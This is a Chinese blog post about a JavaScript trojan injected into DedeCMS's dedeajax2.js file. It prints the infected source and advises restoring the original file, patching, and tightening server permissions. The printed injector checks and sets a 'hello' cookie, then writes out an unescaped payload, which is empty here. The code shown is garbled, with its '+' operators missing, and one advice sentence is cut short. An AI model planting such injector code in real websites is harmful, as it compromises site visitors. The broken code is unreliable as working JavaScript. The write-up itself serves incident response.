结果发现,Dedecms织梦AJAX2.Js被植入了木马。源码如下: //初始化xmldom function InitXDom(){ if(DedeXDOM!=null) return; var obj = null; if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、firefox var parser = new DOMParser(); obj = parser.parseFromString(xmlText,"text/xml"); } else { // IE try { obj = new ActiveXObject("MSXML2.DOMdocument");} catch (e) { } if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { } } DedeXDOM = obj; }; //以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了 if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));} 用原版本的dedeAJAX2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。 不过建议大家,多注意Dedecms的官方补丁,unix服务器的织梦站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。
上一篇:织梦DEDE给自定义模型的字段加上链接
下一篇:织梦DEDECMS循环滚动图片制作方法
总结以上是内存溢出为你收集整理的织梦dedecms:dedeajax2.js被植入js木马全部内容,希望文章能够帮你解决织梦dedecms:dedeajax2.js被植入js木马所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)